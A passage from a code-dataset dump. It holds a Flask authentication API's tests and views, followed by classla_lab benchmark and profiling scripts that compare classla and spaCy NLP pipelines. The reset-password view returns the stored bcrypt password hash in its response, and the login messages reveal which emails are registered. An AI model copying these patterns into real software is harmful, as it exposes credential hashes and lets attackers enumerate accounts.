"text": "'''A module for testing registration, login, reset password and\nlogout\n'''\nimport unittest\nimport json\nfrom app import create_app\nfrom app import db\n\n\nclass RegistrationLoginTokenTestCase(unittest.TestCase):\n '''A class for that instantiates a client for testing and has functions\n for testing that the registration, login logout and reseting password work\n '''\n\n def setUp(self):\n '''A method to set up an instance of a client to test'''\n self.app = create_app(config_name='testing')\n self.client = self.app.test_client\n self.information = {\n 'user_email': '[email protected]',\n 'user_password': 'password'\n }\n\n with self.app.app_context():\n db.session.close()\n db.drop_all()\n db.create_all()\n\n def register_one_user(self):\n '''A method that registers one user'''\n result_of_post_method = self.client().post('/auth/register', data=self.information)\n return result_of_post_method\n\n def test_register_endpoint(self):\n '''A happy path to test registration with right information'''\n post_result = self.register_one_user()\n result = json.loads(post_result.data.decode())\n self.assertIn(\"Email and password entered correctly\", result['message'])\n self.assertEqual(post_result.status_code, 201)\n\n def test_similar_users(self):\n '''A method to test no registration when the user had been registered\n before\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n second_similar_post = self.register_one_user()\n result = json.loads(second_similar_post.data.decode())\n self.assertEqual(result['message'], 'The user email entered already exists!')\n self.assertEqual(second_similar_post.status_code, 409)\n\n def test_the_user_login(self):\n '''A method to thest that login works happy path and returns right variables'''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_post_method = self.client().post('/auth/login', data=self.information)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'], 'User logged in')\n self.assertNotEqual(result['access-token'], None)\n self.assertEqual(result_of_post_method.status_code, 200)\n\n def test_non_registereduser(self):\n '''A method to test that a user cannot login with a wrong email'''\n user_data = {\n 'user_email':'[email protected]',\n 'user_password':'password'\n }\n result_of_post_method = self.client().post('/auth/login', data=user_data)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'],\n 'User email does not exist! Register or check the '\n 'user email entered again.')\n self.assertEqual(result_of_post_method.status_code, 401)\n\n def test_wrong_password(self):\n '''A method to test that a user cannot login by inserting a wrong password\n to his email address that had been registered\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n user_data = {\n 'user_email':'[email protected]',\n 'user_password': 'wrong_password'\n }\n result_of_post_method = self.client().post('/auth/login', data=user_data)\n result = json.loads(result_of_post_method.data.decode())\n self.assertEqual(result['message'], 'Wrong password entered for the user [email protected] !')\n self.assertEqual(result_of_post_method.status_code, 401)\n\n def test_reset_password(self):\n '''A method to test that the password is reset when all values inserted are\n right\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'password',\n 'new_password':'new_test_password',\n 'verify_new_password': 'new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n\n self.assertEqual(result_of_post_method.status_code, 201)\n self.assertIn('Password reset', str(result_of_post_method.data))\n\n def test_reset_password_sad_path(self):\n '''A method to test that the reset password does not work when the\n wrong password has been used\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'wrongpassword',\n 'new_password':'new_test_password',\n 'verify_new_password': 'new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n self.assertEqual(result_of_post_method.status_code, 400)\n self.assertIn('Wrong password entered', str(result_of_post_method.data))\n\n def test_reset_password_sad_path_1(self):\n '''A method to test that reset password cannot work when the new password\n does not match the verify new password\n '''\n post_result = self.register_one_user()\n self.assertEqual(post_result.status_code, 201)\n result_of_login = self.client().post('/auth/login', data=self.information)\n self.assertEqual(result_of_login.status_code, 200)\n token = json.loads(result_of_login.data.decode())['access-token']\n reset_data = {\n 'user_password':'password',\n 'new_password':'new_test_password',\n 'verify_new_password': 'wrong_new_test_password'\n }\n result_of_post_method = self.client().post('auth/reset-password',\n headers=dict(Authorization='Bearer '+ token),\n data=reset_data\n )\n self.assertEqual(result_of_post_method.status_code, 400)\n self.assertIn('New password and verify new password do not match',\n str(result_of_post_method.data))\n"
},
{
"alpha_fraction": 0.5375774502754211,
"alphanum_fraction": 0.5481663346290588,
"avg_line_length": 40.196807861328125,
"blob_id": "4ddf403a710117729c5d6ed3dfaf376e84bbc4b6",
"content_id": "0ecf8ca00d2ac10a8bc6b5956b8a6b7fbcf5aa47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7744,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 188,
"path": "/app/extensions/views_for_register_and_login.py",
"repo_name": "WinstonKamau/FLASK_API",
"src_encoding": "UTF-8",
"text": "from . import registration_login_blueprint\nimport re\nfrom flask.views import MethodView\nfrom flask import make_response, request, jsonify\nfrom app.models import User\nfrom flask_bcrypt import Bcrypt\n\n\nclass Registration(MethodView):\n\n def post(self):\n user_email_status = str(request.data.get('user_email', ''))\n user_password_status = str(request.data.get('user_password', ''))\n if not user_email_status or not user_password_status:\n response = jsonify({\n 'message': \"Key variables to be entered are\"\n \"supposed to be 'user_email' and 'user_password'\"\n })\n return make_response(response), 400\n if not re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',\n request.data['user_email']):\n response = {\n 'message': 'The user email entered is not valid ensure it has @ and .'\n }\n return make_response(jsonify(response)), 400\n if User.query.filter_by(user_email=request.data['user_email']).first():\n response = {\n 'message':'The user email entered already exists!'\n }\n return make_response(jsonify(response)), 409\n else:\n user = User.query.filter_by(user_email=request.data['user_email']).first()\n data_posted = request.data\n user_email = data_posted['user_email']\n try:\n user_password = data_posted['user_password']\n user = User(user_email=user_email, user_password=user_password)\n user.save_user()\n response = {\n 'message': 'Email and password entered correctly. Use them to log in'\n }\n return make_response(jsonify(response)), 201\n except Exception as e:\n response = {\n 'message': str(e)\n }\n return make_response(jsonify(response)), 401\n\nclass Login(MethodView):\n def post(self):\n user_email_status = str(request.data.get('user_email', ''))\n user_password_status = str(request.data.get('user_password', ''))\n if not user_email_status or not user_password_status:\n response = jsonify({\n 'message': \"Key variables to be entered are supposed to be 'user_email' and 'user_password'\"\n })\n return make_response(response), 400\n if not re.match('^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$',\n request.data['user_email']):\n response = {\n 'message': 'The user email entered is not valid ensure it has @ and .'\n }\n return make_response(jsonify(response)), 400\n if not User.query.filter_by(user_email=request.data['user_email']).first():\n response = {\n 'message': 'User email does not exist! Register or check the user email' \n ' entered again.'\n }\n return make_response(jsonify(response)), 401\n else:\n user = User.query.filter_by(user_email=request.data['user_email']).first()\n post_data = request.data\n if user.password_confirm(post_data['user_password']):\n token = user.create_encoded_token(user.id)\n if token:\n response = {\n 'message': 'User logged in',\n 'access-token': token.decode()\n }\n return make_response(jsonify(response)), 200\n else:\n response = {\n 'message': 'Wrong password entered for the user %s !'%(request.data['user_email'])\n }\n return make_response(jsonify(response)), 401 \n\n\n\nclass ResetPassword(MethodView):\n def post(self):\n header = request.headers.get('Authorization')\n if not header:\n response = jsonify({\n 'message': 'No authorisation header given'\n })\n return make_response(response), 401 \n if ' ' not in header:\n response= jsonify({\n 'message1': 'A space needs to exist between the Bearer and token.',\n 'message2': 'The authorization should be typed as the example below',\n 'example': 'Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE1MDMzNDUzMjIsInN1YiI6MiwiaWF0IjoxNTAzMzQxNzIyfQ.fCZ3ibX-vHQ5SKxYbrarQ0I8lvq5TgMt03A5vGlGhDE\"'\n })\n return make_response(response), 401\n user_id = User.decode_token_to_sub(header)\n if not isinstance(user_id, int):\n response = jsonify({\n 'message': 'Invalid token entered'\n })\n return make_response(response), 401\n if 'user_password' not in request.data.keys():\n response = jsonify({\n 'message': \"To reset password the variable 'user_password' for the current password needs to be inserted\"\n })\n return make_response (response), 400\n if 'new_password' not in request.data.keys():\n response = jsonify({\n 'message': \"The key 'new_password' has not been entered\"\n })\n return make_response(response), 400\n if 'verify_new_password' not in request.data.keys():\n response = jsonify({\n 'message': \"The key 'verify_new_password' has not been entered\" \n })\n return make_response(response), 400\n if not request.data.get('new_password') == request.data.get('verify_new_password'):\n response = jsonify({\n 'message': 'New password and verify new password do not match'\n })\n return make_response(response), 400 \n if not User.query.filter_by(id=user_id).first().password_confirm(request.data.get('user_password')):\n response = jsonify({\n 'message': 'Wrong password entered for the user'\n })\n return make_response(response), 400\n else:\n current_password = request.data.get('user_password')\n user = User.query.filter_by(id=user_id).first()\n new_password = request.data.get('new_password')\n verify_new_password = request.data.get ('verify_new_password')\n user.user_password = Bcrypt().generate_password_hash(new_password).decode()\n user.save_user()\n response = jsonify({\n 'user_email': user.user_email,\n 'user_password': user.user_password,\n 'message': 'Password reset'\n })\n return make_response (response), 201 \n\nclass Logout(MethodView):\n def post(self):\n '''A method to delete the token on the client's browser needs to be added\n and the response below given\n '''\n response = jsonify({\n 'message': 'Logged out'\n })\n return make_response(response), 200\n\nview_for_registration = Registration.as_view('register_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/register',\n view_func=view_for_registration,\n methods=['POST'])\n\nview_for_login = Login.as_view('login_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/login',\n view_func=view_for_login,\n methods=['POST']\n)\n\nview_for_reset_password = ResetPassword.as_view('reset_password_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/reset-password',\n view_func=view_for_reset_password,\n methods=['POST']\n)\n\nview_for_logout = Logout.as_view('logout_view')\n\nregistration_login_blueprint.add_url_rule(\n '/auth/logout',\n view_func=view_for_logout,\n methods=['POST']\n)"
}
] | 11 |
IgorTavcar/classla_lab
|
https://github.com/IgorTavcar/classla_lab
|
05e97d13a5fcc6b43f2d270519e83c9381dc60c8
|
dd9ad3a05b1df62875ed0abd76cdad7e22df7ca6
|
b36ebc2cd1e42dbbeee83d761c03fc2cbeab2ac1
|
refs/heads/master
| 2023-08-18T13:20:00.486414 | 2021-10-03T11:49:57 | 2021-10-03T11:49:57 | 378,699,247 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7099391222000122,
"alphanum_fraction": 0.7099391222000122,
"avg_line_length": 35.51852035522461,
"blob_id": "4c236df2e13bf9aa9e20f01182a5f8140dcceb9a",
"content_id": "1b2a530188dac8bb2ad71c98517b1699d85a2941",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 986,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 27,
"path": "/scripts/profile_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nNOW=$(date +\"%Y%m%d_%H%M%S\")\n\nPROFILE_FILE_TOK=\"${PROFILE_DIR}/${NOW}_tok-classla.pstat\"\n\nPROFILE_FILE_POS_Q=\"${PROFILE_DIR}/${NOW}_pos-classla-q.pstat\"\nPROFILE_FILE_NER_Q=\"${PROFILE_DIR}/${NOW}_ner-classla-q.pstat\"\nPROFILE_FILE_LEM_Q=\"${PROFILE_DIR}/${NOW}_lem-classla-q.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile \"$PROFILE_FILE_TOK\"\n\npython benchmarks/bm_pos.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_POS_Q\"\npython benchmarks/bm_ner.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_NER_Q\"\npython benchmarks/bm_lem.py --bm classla_quick --no-report --profile \"$PROFILE_FILE_LEM_Q\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_TOK\"\n\necho \"... cProfile statistics generated at: $PROFILE_FILE_POS_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_NER_Q\"\necho \"... cProfile statistics generated at: $PROFILE_FILE_LEM_Q\"\n"
},
{
"alpha_fraction": 0.5670190453529358,
"alphanum_fraction": 0.5864693522453308,
"avg_line_length": 24.70652198791504,
"blob_id": "27ecd717123e8d9c8fc85041f67619308f10c106",
"content_id": "110430f32c7f434502d3522f6325dd77359e2756",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2365,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 92,
"path": "/benchmarks/bm_pos.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport spacy\nimport torch\nfrom thinc.api import set_gpu_allocator, require_gpu\n\nimport bm\nimport classla\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_pos')\n\n\n@measure\ndef bm_classla_pos_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_pos_100_sl():\n return _classla(100)\n\n\n@measure\ndef bm_spacy_pos_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_pos_100_en():\n return _spacy(100)\n\n\n@measure\ndef bm_spacy_pos_100_en_trf():\n return _spacy(100, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_pos_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['ner', 'lemmatizer'])\n n_sent = 0\n n_nouns = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_nouns += sum(1 for _ in doc.noun_chunks)\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'nouns': n_nouns, 'count': count}\n\n\ndef _classla(limit: int, cpu: bool = False):\n nlp = classla.Pipeline(processors='tokenize,pos', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n n_sent = 0\n n_nouns = 0\n count = 0\n for line in data.sl():\n doc = nlp(line)\n sentences = doc.sentences\n n_sent += len(sentences)\n for sent in sentences:\n n_nouns += sum(1 for token in sent.tokens if token.to_dict(['upos'])[0]['upos'] == 'NOUN')\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'nouns': n_nouns, 'count': count}\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_pos_sl, 'classla_quick': bm_classla_pos_100_sl,\n 'spacy': bm_spacy_pos_en, 'spacy_quick': bm_spacy_pos_100_en,\n 'spacy_trf': bm_spacy_pos_en_trf, 'spacy_quick_trf': bm_spacy_pos_100_en_trf}\n bm.run(\"pos\", benchmarks)\n"
},
{
"alpha_fraction": 0.5489410161972046,
"alphanum_fraction": 0.550944447517395,
"avg_line_length": 22.608108520507812,
"blob_id": "8ebea8fc92bd73e56618e1f5d41dcbced79fee6c",
"content_id": "0f78583351499804afff71ec5ca7f375b4443bba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3494,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 148,
"path": "/benchmarks/measure.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\nimport os.path\nimport platform\nimport socket\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom functools import wraps\nfrom pathlib import Path\n\nimport pandas as pd\nimport psutil\nimport time\n\nLOG = logging.getLogger('measure')\n\n\n@dataclass\nclass _Report:\n _dir = None\n _name = None\n _ctx = None\n _info = None\n _dfs = None # pending data-frames\n\n #\n\n @property\n def is_opened(self):\n return self._ctx is not None\n\n def open(self, dir_, prefix, info: dict):\n assert not self.is_opened\n\n self._dir = dir_\n self._name = prefix + self._now\n self._info = info\n self._dfs = None\n\n self._ctx = _Report._get_ctx()\n\n LOG.info(\"... opening report: {}\".format(self._path))\n\n def close(self):\n assert self.is_opened\n\n if self._dfs:\n self._flush()\n self._ctx = None\n\n #\n\n def append(self, ts, func, execution_time, results):\n assert self.is_opened\n\n if self._dfs is None:\n self._dfs = []\n\n df = dict(self._ctx)\n\n if self._info:\n df.update(self._info)\n\n df['ts'] = ts\n df['func'] = func.__name__\n df['execution-time'] = execution_time\n\n if results:\n df.update(results)\n\n self._dfs.append(df)\n\n #\n\n @property\n def _path(self) -> str:\n return os.path.join(self._dir, \"{}.csv\".format(self._name))\n\n @property\n def _now(self) -> str:\n return \"{:%Y%m%d_%H%M%S}\".format(datetime.now())\n\n def _flush(self):\n assert self._dfs is not None\n\n df = pd.DataFrame()\n df = df.append(self._dfs, ignore_index=True, sort=False)\n\n p = self._path\n os.makedirs(Path(p).parent, exist_ok=True)\n\n LOG.info(\"... writing report: {}\".format(p))\n df.to_csv(p)\n self._dfs = None\n\n @staticmethod\n def _get_ctx():\n try:\n return {'platform': platform.system(), 'platform-release': platform.release(),\n # 'platform-version': platform.version(),\n 'architecture': platform.machine(),\n 'hostname': socket.gethostname(), 'processor': platform.processor(),\n 'ram-gb': str(round(psutil.virtual_memory().total / (1024.0 ** 3))),\n 'cpu-count': psutil.cpu_count()}\n except Exception as e:\n logging.exception(e)\n\n\n_REPORT = _Report()\n\n\ndef open_report(dir_='var/bm/reports', prefix=\"report_\", info=None):\n _REPORT.open(dir_, prefix, info)\n\n\ndef close_report():\n _REPORT.close()\n\n\n#\n\ndef _report_entry(ts, func, duration, results):\n _REPORT.append(ts, func, duration, results)\n\n\n#\n\ndef measure(func):\n @wraps(func)\n def _time_it(*args, **kwargs):\n start = time.perf_counter()\n LOG.info('func: {}'.format(func.__name__))\n\n ts = int(time.time()) # ts is part of report-entry as the func invocation timestamp\n\n results = {}\n try:\n results = func(*args, **kwargs)\n except BaseException as e:\n results = {'exception': e}\n finally:\n LOG.info('func: {}, results: {}'.format(func.__name__, results))\n duration = time.perf_counter() - start\n LOG.info('func: {}, execution-time: {:.3f} sec'.format(func.__name__, duration))\n if _REPORT.is_opened:\n _report_entry(ts, func, duration, results)\n return results\n\n return _time_it\n"
},
{
"alpha_fraction": 0.7522522807121277,
"alphanum_fraction": 0.7522522807121277,
"avg_line_length": 23.77777862548828,
"blob_id": "8cf4c4fe056969b4ff0b8a49e091e5c4240beaf7",
"content_id": "4f86433a6218fe293084e45a98cbc2efd99822b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 9,
"path": "/scripts/bm_all_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_pos.py --bm classla spacy_trf\npython benchmarks/bm_ner.py --bm classla spacy_trf\npython benchmarks/bm_lem.py --bm classla classla_idl spacy_trf"
},
{
"alpha_fraction": 0.7686832547187805,
"alphanum_fraction": 0.7686832547187805,
"avg_line_length": 27.100000381469727,
"blob_id": "43df22c29ff3e5e2d5b7b009d3d59cde8e47ba03",
"content_id": "58bfd3c06817b23cb11f25b81b9d698c4ebfdaec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 281,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 10,
"path": "/scripts/bm_quick.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_tok.py\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick\n"
},
{
"alpha_fraction": 0.572139322757721,
"alphanum_fraction": 0.5886194109916687,
"avg_line_length": 25.57851219177246,
"blob_id": "040531401851bb2254863b26050822b1a6b2d347",
"content_id": "de78401f1dcd7c92e20567cee565da4ca86bf0bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3216,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 121,
"path": "/benchmarks/bm_lem.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport classla\nimport spacy\nimport torch\nfrom thinc.backends import set_gpu_allocator\nfrom thinc.util import require_gpu\n\nimport bm\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_lem')\n\n\n@measure\ndef bm_classla_lemmas_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_identity_lemmas_sl():\n return _classla(data.sl_size(), identity=True)\n\n\n@measure\ndef bm_classla_lemmas_500_sl():\n return _classla(500)\n\n\n@measure\ndef bm_classla_identity_lemmas_500_sl():\n return _classla(500, identity=True)\n\n\n@measure\ndef bm_spacy_lemmas_500_en():\n return _spacy(500)\n\n\n@measure\ndef bm_spacy_lemmas_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_lemmas_500_en_trf():\n return _spacy(500, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_lemmas_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['ner'])\n n_sent = 0\n n_lem = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_lem += sum(1 for token in doc if token.lemma_ != token.text.lower())\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'lemmas': n_lem, 'count': count}\n\n\ndef _classla(limit: int, identity=False, cpu: bool = False):\n if identity:\n nlp = classla.Pipeline(processors='tokenize,lemma', dir=bm.CLASSLA_MODELS_DIR, lang='sl',\n lemma_use_identity=True, use_gpu=not cpu)\n else:\n nlp = classla.Pipeline(processors='tokenize,pos,lemma', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n\n n_sent = 0\n n_lem = 0\n count = 0\n for batch in data.sl():\n doc = nlp(batch)\n sentences = doc.sentences\n n_sent += len(sentences)\n n_lem += len(_lemmas(doc))\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'lemmas': n_lem, 'count': count}\n\n\ndef _lemmas(doc) -> list:\n build = []\n for sentence in doc.sentences:\n for token in sentence.tokens:\n for word in token.words:\n dict = word.to_dict()\n if dict['text'].lower() != dict['lemma']:\n build.append(word)\n return build\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_lemmas_sl,\n 'classla_quick': bm_classla_lemmas_500_sl,\n 'classla_idl': bm_classla_identity_lemmas_sl,\n 'classla_idl_quick': bm_classla_identity_lemmas_500_sl,\n 'spacy': bm_spacy_lemmas_en, 'spacy_quick': bm_spacy_lemmas_500_en,\n 'spacy_trf': bm_spacy_lemmas_en_trf, 'spacy_quick_trf': bm_spacy_lemmas_500_en_trf}\n bm.run(\"lem\", benchmarks)\n"
},
{
"alpha_fraction": 0.7651515007019043,
"alphanum_fraction": 0.7651515007019043,
"avg_line_length": 28.44444465637207,
"blob_id": "0282771ba67a62aa284af43fba8c2763e8f84b31",
"content_id": "c71e100efb72d3dff0088c3493d98fa642f15a2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 264,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 9,
"path": "/scripts/bm_quick_trf.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\npython benchmarks/bm_pos.py --bm classla_quick spacy_quick_trf\npython benchmarks/bm_ner.py --bm classla_quick spacy_quick_trf\npython benchmarks/bm_lem.py --bm classla_quick classla_idl_quick spacy_quick_trf"
},
{
"alpha_fraction": 0.5783664584159851,
"alphanum_fraction": 0.5827814340591431,
"avg_line_length": 16.423076629638672,
"blob_id": "d1754be0e01264777afb8e9a6645a21ae8cd7943",
"content_id": "151b002001411845c282e6e600eeffb787add3e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 453,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 26,
"path": "/scripts/profile_sent_classla.sh",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n. \"./env/bin/activate\"\n\nexport PYTHONPATH=.\n\nPROFILE_DIR='var/bm/profiles'\n\nPROFILE_FILE=\"$PROFILE_DIR/tok-classla.pstat\"\n\npython benchmarks/bm_tok.py --bm classla --no-report --profile $PROFILE_FILE\n\necho \"... cProfile statistics generated at: $PROFILE_FILE\"\n\nwhile [[ $# -ne 0 ]]\ndo\n arg=\"$1\"\n case \"$arg\" in\n --interactive)\n snakeviz $PROFILE_FILE\n ;;\n *)\n ;;\n esac\n shift\ndone\n"
},
{
"alpha_fraction": 0.5601626038551331,
"alphanum_fraction": 0.5817072987556458,
"avg_line_length": 23.356435775756836,
"blob_id": "3b30b9d0a878f330a35055fe762c68a2d785d482",
"content_id": "cc70ec2f90391b7231a5bd20d91df3a8e768e40c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2460,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 101,
"path": "/benchmarks/bm_ner.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport spacy\nimport torch\nfrom thinc.backends import set_gpu_allocator\nfrom thinc.util import require_gpu\n\nimport bm\nimport classla\nimport data\nfrom measure import measure\n\nLOG = logging.getLogger('bm_ner')\n\n\n@measure\ndef bm_classla_ner_sl():\n return _classla(data.sl_size())\n\n\n@measure\ndef bm_classla_ner_1000_sl():\n return _classla(1000)\n\n\n@measure\ndef bm_spacy_ner_en():\n return _spacy(data.en_size())\n\n\n@measure\ndef bm_spacy_ner_1000_en():\n return _spacy(1000)\n\n\n@measure\ndef bm_spacy_ner_1000_en_trf():\n return _spacy(1000, model=bm.TRF_SPACY_MODEL)\n\n\n@measure\ndef bm_spacy_ner_en_trf():\n return _spacy(data.en_size(), model=bm.TRF_SPACY_MODEL)\n\n\n#\n\ndef _spacy(limit: int, model: str = bm.DEFAULT_SPACY_MODEL, cpu: bool = False):\n if cpu or not torch.cuda.is_available():\n spacy.require_cpu()\n else:\n set_gpu_allocator(\"pytorch\")\n require_gpu(0)\n\n nlp = spacy.load(model, exclude=['lemmatizer'])\n n_sent = 0\n n_ne = 0\n count = 0\n for doc in nlp.pipe(data.en()):\n n_sent += sum(1 for _ in doc.sents)\n n_ne += sum(1 for _ in doc.ents)\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'ne': n_ne, 'count': count}\n\n\ndef _classla(limit: int, cpu: bool = False):\n nlp = classla.Pipeline(processors='tokenize,ner', dir=bm.CLASSLA_MODELS_DIR, lang='sl', use_gpu=not cpu)\n n_sent = 0\n n_ne = 0\n count = 0\n for line in data.sl():\n doc = nlp(line)\n sentences = doc.sentences\n n_sent += len(sentences)\n n_ne += len(_ne(doc))\n count += 1\n if (count % (limit // 10)) == 0:\n LOG.info(\"... count: {} of {}\".format(count, limit))\n if count >= limit:\n break\n return {'sentences': n_sent, 'ne': n_ne, 'count': count}\n\n\ndef _ne(doc) -> list:\n build = []\n for sentence in doc.sentences:\n for token in sentence.tokens:\n if token.ner != 'O':\n build.append(token)\n return build\n\n\nif __name__ == '__main__':\n benchmarks = {'classla': bm_classla_ner_sl, 'classla_quick': bm_classla_ner_1000_sl,\n 'spacy': bm_spacy_ner_en, 'spacy_quick': bm_spacy_ner_1000_en,\n 'spacy_trf': bm_spacy_ner_en_trf, 'spacy_quick_trf': bm_spacy_ner_1000_en_trf}\n bm.run(\"ner\", benchmarks)\n"
},
{
"alpha_fraction": 0.531862735748291,
"alphanum_fraction": 0.5441176295280457,
"avg_line_length": 24.5,
"blob_id": "66c3bab75e79634c567563ff0e55b289062ad3d4",
"content_id": "48fb5884f48bda585e649a561f510f6c486266e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1224,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 48,
"path": "/benchmarks/data.py",
"repo_name": "IgorTavcar/classla_lab",
"src_encoding": "UTF-8",
